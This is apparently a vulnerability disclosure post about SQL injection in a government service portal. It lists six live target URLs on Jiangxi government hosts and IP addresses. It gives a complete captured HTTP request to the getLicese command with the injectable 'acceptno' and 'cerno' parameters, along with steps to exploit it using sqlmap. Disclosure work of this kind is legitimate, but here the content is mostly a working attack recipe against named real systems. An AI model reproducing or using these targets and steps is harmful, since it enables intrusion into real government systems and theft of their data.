### Summary

As titled.

### Details

Generic SQL injection in a system in use by a government, #6.

Cases:

http://218.65.5.117:8008/outportal/getbackpassw/getbackPas.jsp
http://120.203.196.20/outportal/getbackpassw/getbackPas.jsp
http://xzfw.jxcr.gov.cn/outportal/getbackpassw/getbackPas.jsp
http://xzfw.jinxi.gov.cn/outportal/getbackpassw/getbackPas.jsp
http://117.40.187.175:8008/outportal/getbackpassw/getbackPas.jsp
http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp

### Proof of vulnerability

Each target has to be captured separately, one request per site. The getbackPas.jsp URLs above identify installations of the same /outportal/ application; the request below, captured against http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp, goes to that application's getLicese AJAX command, whose JSON body carries the user-supplied `acceptno` and `cerno` parameters.

```
POST parameters:
POST /outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentQueryCommand/getLicese HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp
x-requested-with: XMLHttpRequest
Content-Type: application/json
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: wssp.jiangxi.gov.cn:8008
Content-Length: 108
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=EE31BE605CD71740C767AF5FA575E5D6

{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"acceptno":"1","cerno":"1"},"length":2}}
```

Save the captured request to a file and run it with `sqlmap -r`; sqlmap parses the JSON body and tests the parameters inside it.

[![QQ图片20150531101614.png](https://images.seebug.org/upload/201505/311024189eecdf903a123cc64b0c16d28367e95b.png)](https://images.seebug.org/upload/201505/311024189eecdf903a123cc64b0c16d28367e95b.png)

[![QQ图片20150531101628.png](https://images.seebug.org/upload/201505/311024272c8738425d13d31167390cd518885d08.png)](https://images.seebug.org/upload/201505/311024272c8738425d13d31167390cd518885d08.png)